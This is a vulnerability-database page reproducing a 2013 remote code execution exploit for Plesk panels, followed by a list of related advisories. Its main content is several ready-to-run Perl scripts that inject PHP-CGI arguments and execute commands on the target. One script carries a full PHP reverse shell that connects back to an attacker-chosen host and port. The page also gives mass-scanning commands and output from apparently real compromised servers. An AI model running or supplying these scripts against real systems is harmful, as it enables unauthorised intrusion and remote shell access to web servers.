Lucene search
RootSSV:79637HistoryJul 01, 2014 - 12:00 a.m.
Plesk < 9.5.4 - Zeroday Remote Exploit
2014-07-0100:00:00
Root
www.seebug.org
125
0.975 High
EPSS
Percentile
100.0%
No description provided by source.
Plesk Apache zeroday / June 2013
discovered & exploited by kingcope
this Plesk configuration setting makes it possible:
scriptAlias /phppath/ "/usr/bin/"
Furthermore this is not cve-2012-1823 because the php interpreter is called directly.
(no php file is called)
Parallels Plesk Remote Exploit -- PHP Code Execution and therefore Command Execution
Affected and tested: Plesk 9.5.4
Plesk 9.3
Plesk 9.2
Plesk 9.0
Plesk 8.6
Discovered & Exploited by Kingcope / June 2013
Affected and tested OS: RedHat, CentOS, Fedora
Affected and tested Platforms: Linux i386, Linux x86_64
Untested OS: Windows (php.exe?)
Unaffected: 11.0.9 due to compiled in protection of PHP version
Traces in /var/log/httpd/access_log: 192.168.74.142 - - [19/Mar/2013:18:59:41 +0100] "POST /%70%68%70%70%61%74%68/%70%68%70?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%
6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%
62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%
3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%6E HTTP/1.1" 200 203 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
Shodanhq overview of Plesk on Linux:
http://www.shodanhq.com/search?q=plesklin
perl plesk-simple.pl <ip address>
...
...
...
OK
Linux ip.unsecure.net 2.6.18-028stab101.1 #1 SMP Sun Jun 24
19:50:48 MSD 2012 i686 i686 i386 GNU/Linux
uid=48(apache) gid=48(apache) groups=48(apache),2521(psaserv)
---
./pnscan -w"GET /phppath/php HTTP/1.0\r\n\r\n" -r "500 Internal" 76.12.54.163/16 80
perl plesk-simple.pl 76.12.81.206
HTTP/1.1 200 OK
Date: Sat, 16 Mar 2013 13:39:35 GMT
Server: Apache/2.2.3 (CentOS)
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html
77
Linux 114114.unsecureweb.com 2.6.18-308.24.1.el5 #1 SMP Tue Dec 4 17:43:34 E
ST 2012 x86_64 x86_64 x86_64 GNU/Linux
3e
uid=48(apache) gid=48(apache) groups=48(apache),2521(psaserv)
0
perl plesk-simple-ssl.pl <ip> (use HTTPS because HTTP gave an internal server error)
HTTP/1.1 200 OK
Date: Tue, 19 Mar 2013 15:29:28 GMT
Server: Apache/2.0.54 (Fedora)
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html
3
OK
60
Linux www.ucdavis.edu 2.6.17-1.2142_FC4 #1 Tue Jul 11 22:41:14 EDT 2006 i686 i686 i386 GNU/Linux
4c
uid=48(apache) gid=48(apache) groups=48(apache),500(webadmin),2522(psaserv)
0
use IO::Socket;
use URI::Escape;
$sock = IO::Socket::INET->new(PeerAddr => $ARGV[0],
PeerPort => 80,
Proto => 'tcp');
$pwn = '<?php echo "Content-Type:text/html\r\n\r\n";echo "OK\n";system("uname -a;id;"); ?>';
$arguments = uri_escape("-d","\0-\377"). "+" .
uri_escape("allow_url_include=on","\0-\377"). "+" .
uri_escape("-d","\0-\377"). "+" .
uri_escape("safe_mode=off","\0-\377"). "+" .
uri_escape("-d","\0-\377"). "+" .
uri_escape("suhosin.simulation=on","\0-\377"). "+" .
uri_escape("-d","\0-\377"). "+" .
uri_escape("disable_functions=\"\"","\0-\377"). "+" .
uri_escape("-d","\0-\377"). "+" .
uri_escape("open_basedir=none","\0-\377"). "+" .
uri_escape("-d","\0-\377"). "+" .
uri_escape("auto_prepend_file=php://input","\0-\377"). "+" .
uri_escape("-n","\0-\377");
$path = uri_escape("phppath","\0-\377") . "/" . uri_escape("php","\0-\377");
print $sock "POST /$path?$arguments HTTP/1.1\r\n"
."Host: $ARGV[0]\r\n"
."Content-Type: application/x-www-form-urlencoded\r\n"
."Content-Length: ". length($pwn) ."\r\n\r\n" . $pwn;
while(<$sock>) {
print;
}
use IO::Socket::SSL;
use URI::Escape;
$sock = IO::Socket::SSL->new(PeerAddr => $ARGV[0],
PeerPort => 443,
Proto => 'tcp');
$pwn = '<?php echo "Content-Type:text/html\r\n\r\n";echo "OK\n";system("uname -a;id;"); ?>';
$arguments = uri_escape("-d","\0-\377"). "+" .
uri_escape("allow_url_include=on","\0-\377"). "+" .
uri_escape("-d","\0-\377"). "+" .
uri_escape("safe_mode=off","\0-\377"). "+" .
uri_escape("-d","\0-\377"). "+" .
uri_escape("suhosin.simulation=on","\0-\377"). "+" .
uri_escape("-d","\0-\377"). "+" .
uri_escape("disable_functions=\"\"","\0-\377"). "+" .
uri_escape("-d","\0-\377"). "+" .
uri_escape("open_basedir=none","\0-\377"). "+" .
uri_escape("-d","\0-\377"). "+" .
uri_escape("auto_prepend_file=php://input","\0-\377"). "+" .
uri_escape("-n","\0-\377");
$path = uri_escape("phppath","\0-\377") . "/" . uri_escape("php","\0-\377");
print $sock "POST /$path?$arguments HTTP/1.1\r\n"
."Host: $ARGV[0]\r\n"
."Content-Type: application/x-www-form-urlencoded\r\n"
."Content-Length: ". length($pwn) ."\r\n\r\n" . $pwn;
while(<$sock>) {
print;
}
#CentOS/Redhat Linux: yum install perl-IO-Socket-SSL.noarch
###############################################################################################################
plesk-simple-ssl.pl
#plesk remote exploit by kingcope
#all your base belongs to me :>
use IO::Socket::SSL;
use URI::Escape;
$sock = IO::Socket::SSL->new(PeerAddr => $ARGV[0],
PeerPort => 443,
Proto => 'tcp');
$pwn = '<?php echo "Content-Type:text/html\r\n\r\n";echo "OK\n";system("uname -a;id;"); ?>';
$arguments = uri_escape("-d","\0-\377"). "+" .
uri_escape("allow_url_include=on","\0-\377"). "+" .
uri_escape("-d","\0-\377"). "+" .
uri_escape("safe_mode=off","\0-\377"). "+" .
uri_escape("-d","\0-\377"). "+" .
uri_escape("suhosin.simulation=on","\0-\377"). "+" .
uri_escape("-d","\0-\377"). "+" .
uri_escape("disable_functions=\"\"","\0-\377"). "+" .
uri_escape("-d","\0-\377"). "+" .
uri_escape("open_basedir=none","\0-\377"). "+" .
uri_escape("-d","\0-\377"). "+" .
uri_escape("auto_prepend_file=php://input","\0-\377"). "+" .
uri_escape("-n","\0-\377");
$path = uri_escape("phppath","\0-\377") . "/" . uri_escape("php","\0-\377");
print $sock "POST /$path?$arguments HTTP/1.1\r\n"
."Host: $ARGV[0]\r\n"
."User-Agent: Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)\r\n"
."Content-Type: application/x-www-form-urlencoded\r\n"
."Content-Length: ". length($pwn) ."\r\n\r\n" . $pwn;
while(<$sock>) {
print;
}
#CentOS/Redhat Linux: yum install perl-IO-Socket-SSL.noarch
###############################################################################################################
plesk-simple.pl
#plesk remote exploit by kingcope
#all your base belongs to me :>
use IO::Socket;
use URI::Escape;
$sock = IO::Socket::INET->new(PeerAddr => $ARGV[0],
PeerPort => 80,
Proto => 'tcp');
$pwn = '<?php echo "Content-Type:text/html\r\n\r\n";echo "OK\n";system("uname -a;id;"); ?>';
$arguments = uri_escape("-d","\0-\377"). "+" .
uri_escape("allow_url_include=on","\0-\377"). "+" .
uri_escape("-d","\0-\377"). "+" .
uri_escape("safe_mode=off","\0-\377"). "+" .
uri_escape("-d","\0-\377"). "+" .
uri_escape("suhosin.simulation=on","\0-\377"). "+" .
uri_escape("-d","\0-\377"). "+" .
uri_escape("disable_functions=\"\"","\0-\377"). "+" .
uri_escape("-d","\0-\377"). "+" .
uri_escape("open_basedir=none","\0-\377"). "+" .
uri_escape("-d","\0-\377"). "+" .
uri_escape("auto_prepend_file=php://input","\0-\377"). "+" .
uri_escape("-n","\0-\377");
$path = uri_escape("phppath","\0-\377") . "/" . uri_escape("php","\0-\377");
print $sock "POST /$path?$arguments HTTP/1.1\r\n"
."Host: $ARGV[0]\r\n"
."User-Agent: Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)\r\n"
."Content-Type: application/x-www-form-urlencoded\r\n"
."Content-Length: ". length($pwn) ."\r\n\r\n" . $pwn;
while(<$sock>) {
print;
}
###############################################################################################################
plesk.pl
#plesk remote exploit by kingcope
#all your base belongs to me :>
use IO::Socket;
use IO::Socket::SSL;
use URI::Escape;
sub usage {
print "usage: $0 <target> <http/https> <local_ip> <local_port>\n";exit;
}
if (!defined($ARGV[3])){usage();}
$target=$ARGV[0];
$proto=$ARGV[1];
if ($proto eq "http") {
$sock = IO::Socket::INET->new(
PeerAddr => $ARGV[0],
PeerPort => 80,
Proto => 'tcp');
}elsif ($proto eq "https") {
$sock = IO::Socket::SSL->new(
PeerAddr => $ARGV[0],
PeerPort => 443,
Proto => 'tcp');
}else {usage();}
$lip=$ARGV[2];
$lport=$ARGV[3];
$pwn="<?php echo \"Content-Type: text/plain\r\n\r\n\";set_time_limit (0); \$VERSION = \"1.0\"; \$ip =
'$lip'; \$port = $lport; \$chunk_size = 1400; \$write_a = null;
\$error_a = null; \$shell = '/bin/sh -i'; \$daemon =
0;\$debug = 0; if (function_exists('pcntl_fork')) { \$pid =
pcntl_fork(); if (\$pid == -1) { printit(\"ERROR: Can't fork\");
exit(1);} if (\$pid) { exit(0);} if (posix_setsid() == -1) {
printit(\"Error: Can't setsid()\"); exit(1); } \$daemon = 1;} else {
printit(\"WARNING: Failed to daemonise. This is quite common and not
fatal.\");}chdir(\"/\"); umask(0); \$sock = fsockopen(\$ip, \$port,
\$errno, \$errstr, 30);if (!\$sock) { printit(\"\$errstr (\$errno)\");
exit(1);} \$descriptorspec = array(0 => array(\"pipe\", \"r\"),1 =>
array(\"pipe\", \"w\"), 2 => array(\"pipe\", \"w\"));\$process =
proc_open(\$shell, \$descriptorspec, \$pipes);if
(!is_resource(\$process)) { printit(\"ERROR: Can't spawn shell\");
exit(1);}stream_set_blocking(\$pipes[0],
0);stream_set_blocking(\$pipes[1], 0);stream_set_blocking(\$pipes[2],
0);stream_set_blocking(\$sock, 0);while (1) { if (feof(\$sock)) {
printit(\"done.\"); break;} if
(feof(\$pipes[1])) {printit(\"done.\");break;}\$read_a = array(\$sock, \$pipes[1],
\$pipes[2]);\$num_changed_sockets = stream_select(\$read_a, \$write_a,
\$error_a, null);if (in_array(\$sock, \$read_a)) {if (\$debug)
printit(\"SOCK READ\");\$input = fread(\$sock,
\$chunk_size);if(\$debug) printit(\"SOCK:
\$input\");fwrite(\$pipes[0], \$input);}if (in_array(\$pipes[1],
\$read_a)) {if (\$debug) printit(\"STDOUT READ\");\$input =
fread(\$pipes[1], \$chunk_size);if (\$debug) printit(\"STDOUT:
\$input\");fwrite(\$sock, \$input);}if (in_array(\$pipes[2],
\$read_a)) {if (\$debug) printit(\"STDERR READ\");\$input =
fread(\$pipes[2], \$chunk_size); if (\$debug) printit(\"STDERR:
\$input\");fwrite(\$sock,
\$input);}}fclose(\$sock);fclose(\$pipes[0]);fclose(\$pipes[1]);fclose(\$pipes[2]);proc_close(\$process);function printit (\$string) {if (!\$daemon) {print
\"\$string\n\";}}
?>";
$arguments=uri_escape("-d","\0-\377"). "+" .
uri_escape("allow_url_include=on","\0-\377"). "+" .
uri_escape("-d","\0-\377"). "+" .
uri_escape("safe_mode=off","\0-\377"). "+" .
uri_escape("-d","\0-\377"). "+" .
uri_escape("suhosin.simulation=on","\0-\377"). "+" .
uri_escape("-d","\0-\377"). "+" .
uri_escape("disable_functions=\"\"","\0-\377"). "+" .
uri_escape("-d","\0-\377"). "+" .
uri_escape("open_basedir=none","\0-\377"). "+" .
uri_escape("-d","\0-\377"). "+" .
uri_escape("auto_prepend_file=php://input","\0-\377"). "+" .
uri_escape("-n","\0-\377");
$path=uri_escape("phppath","\0-\377"). "/" . uri_escape("php","\0-\377");
print $sock "POST /$path?$arguments HTTP/1.1\r\n".
"Host: $ARGV[0]\r\n".
"User-Agent: Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)\r\n".
"Content-Type: text/plain\r\n".
"Content-Length: ". length($pwn) ."\r\n\r\n". $pwn;
while(<$sock>){print $_;};
###############################################################################################################
Related
symantec
symantec
PHP 'php-cgi' Information Disclosure Vulnerability
2012-05-04 00:00:00
nessus
nessus
Oracle Linux 5 : php53 (ELSA-2012-0547)
2013-07-12 00:00:00
Oracle Linux 5 / 6 : php (ELSA-2012-0546)
2013-07-12 00:00:00
thn
thn
cert
cert
Parallels Plesk Panel phppath/php vulnerability
2013-06-07 00:00:00
PHP-CGI query string parameter vulnerability
2012-05-03 00:00:00
saint
saint
PHP CGI Query String Parameters Command Execution
2012-05-15 00:00:00
PHP CGI Query String Parameters Command Execution
2012-05-15 00:00:00
PHP CGI Query String Parameters Command Execution
2012-05-15 00:00:00
amazon
amazon
Critical: php
2012-05-09 14:54:00
openvas
openvas
RedHat Update for php53 RHSA-2012:0547-01
2012-05-08 00:00:00
Mandriva Update for php MDVSA-2012:068 (php)
2012-08-03 00:00:00
Amazon Linux: Security Advisory (ALAS-2012-77)
2015-09-08 00:00:00
centos
centos
php security update
2012-05-07 21:09:19
php53 security update
2012-05-07 23:01:16
php security update
2012-06-27 20:21:47
redhat
redhat
(RHSA-2012:0569) Critical: php53 security update
2012-05-10 00:00:00
(RHSA-2012:0568) Critical: php security update
2012-05-10 00:00:00
(RHSA-2012:0546) Critical: php security update
2012-05-07 00:00:00
threatpost
threatpost
Apple Fixes Serious Flaws in iOS 5.1.1
2012-05-08 13:49:34
Leaders from China, U.S. Meet, Agree to Rally Against Cyber Threats
2012-05-08 17:24:22
Exploits for Two-Year-Old PHP Security Vulnerability Found
2014-03-19 12:12:20
attackerkb
attackerkb
CVE-2012-1823
2012-05-11 00:00:00
CVE-2013-4878
2013-07-18 00:00:00
exploitpack
exploitpack
Apache + PHP 5.3.12 5.4.2 - cgi-bin Remote Code Execution
2013-10-29 00:00:00
PHP 5.3.12 5.4.2 - CGI Argument Injection
2012-05-05 00:00:00
Plesk 9.5.4 - Remote Command Execution
2013-06-05 00:00:00
seebug
seebug
PHP-CGI Argument Injection Remote Code Execution
2012-12-25 00:00:00
PHP CGI Argument Injection Exploit
2014-07-01 00:00:00
PHP CGI Argument Injection
2014-07-01 00:00:00
packetstorm
packetstorm
Apache + PHP 5.x Remote Code Execution Python Exploit #2
2013-10-31 00:00:00
PHP CGI Argument Injection
2012-05-22 00:00:00
PHP-CGI Argument Injection Remote Code Execution
2012-12-24 00:00:00
cisa_kev
cisa_kev
PHP-CGI Query String Parameter Vulnerability
2022-03-25 00:00:00
metasploit
metasploit
PHP CGI Argument Injection
2012-05-09 16:01:15
freebsd
freebsd
php -- vulnerability in certain CGI-based setups
2012-05-03 00:00:00
php -- multiple vulnerabilities
2012-05-08 00:00:00
veracode
veracode
Arbitrary Code Execution
2019-01-15 08:51:10
Arbitrary Code Execution
2019-05-02 04:42:12
Denial Of Service (DoS)
2019-05-02 04:42:12
oraclelinux
oraclelinux
php53 security update
2012-05-07 00:00:00
php security update
2012-05-07 00:00:00
zdt
zdt
Apache Magicka Remote Code Execution Vulnerability
2013-10-31 00:00:00
canvas
canvas
Immunity Canvas: PHP_CGI_REMOTE
2012-05-11 10:15:00
nuclei
nuclei
PHP CGI v5.3.12/5.4.2 Remote Code Execution
2021-07-20 09:32:27
cve
cve
prion
prion
Design/Logic Flaw
2012-05-11 10:15:00
Design/Logic Flaw
2012-05-11 10:15:00
Design/Logic Flaw
2012-05-11 10:15:00
securityvulns
securityvulns
PHP CGI Argument Injection Remote Exploit V0.3 - PHP Version
2012-05-24 00:00:00
exploitdb
exploitdb
Plesk < 9.5.4 - Remote Command Execution
2013-06-05 00:00:00
PHP < 5.3.12 / < 5.4.2 - CGI Argument Injection
2012-05-05 00:00:00
Apache + PHP < 5.3.12 / < 5.4.2 - cgi-bin Remote Code Execution
2013-10-29 00:00:00
fedora
fedora
[SECURITY] Fedora 16 Update: maniadrive-1.2-32.fc16.5
2012-05-27 01:52:21
[SECURITY] Fedora 15 Update: php-5.3.13-1.fc15
2012-05-27 07:21:55
[SECURITY] Fedora 16 Update: php-5.3.13-1.fc16
2012-05-27 01:52:21
suse
suse
update for php5 (critical)
2012-05-07 16:08:55
Security update for PHP5 (critical)
2012-05-09 02:08:18
Security update for PHP5 (critical)
2012-05-09 06:08:17
ubuntucve
ubuntucve
ubuntu
ubuntu
PHP vulnerability
2012-05-04 00:00:00
debian
debian
[SECURITY] [DSA 2465-1] php5 security update
2012-05-09 17:23:53
nmap
nmap
http-vuln-cve2012-1823 NSE Script
2012-05-08 05:56:04
osv
osv
php5 - several
2012-05-09 00:00:00
checkpoint_advisories
checkpoint_advisories